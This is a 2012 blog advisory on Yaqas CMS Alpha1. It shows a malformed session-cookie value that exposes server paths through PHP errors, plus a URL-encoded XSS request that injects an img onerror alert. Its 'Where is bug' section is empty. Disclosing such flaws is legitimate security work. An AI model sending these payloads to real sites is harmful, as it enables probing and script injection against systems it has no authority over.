Wednesday 28 March 2012

[EN] Yaqas CMS Alpha1 Information Disclosure

# TITLE ....... # Yaqas CMS Alpha1 Information Disclosure  #
# DATE ........ # 25.03.2012  #
# AUTOHR ...... # http://hauntit.blogspot.com  #
# SOFT LINK ... # YAQAS - Yet Another Question & Answer System @ google  #
# SOFT Copyright# "(C) 2012  Karpouzas George" *  #
# VERSION ..... # Alpha1  #
# TESTED ON ... # LAMP  #
# ..................................................................... #

# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...

#............................................#
# 1. What is this?
This is very nice CMS, You should try it! ;)

#............................................#
# 2. What is the type of vulnerability?
# 2.1 information disclosure

If we'll send PHPSESSID = %3b)() , error information (maybe visible only in src) should be like this:

"Warning: session_start():
The session id is too long or contains illegal characters, valid characters
are a-z, A-Z, 0-9 and '-,' in /your/www/yaqas-release-alpha1/src/lib/session.php on line 32"
 
# 2.2 btw:
http://yaqas-release-alpha1/src/index.php?q=%29%2f*%20]]%3E%20*%2f%3Cimg%20src%3dxxx%20onerror%3dalert%28123123123123%29%3E&type=nhf


#............................................#
# 3. Where is bug :)


#............................................#
# 4. More...

- (*) from license : YAQAS - Yet Another Question & Answer System // Copyright (C) 2012  Karpouzas George
- http://www.google.com
- http://hauntit.blogspot.com
- http://portswigger.net

#............................................#
# Ask me about new projects...
#
# Best regards
#

No comments:

Post a Comment

What do You think...?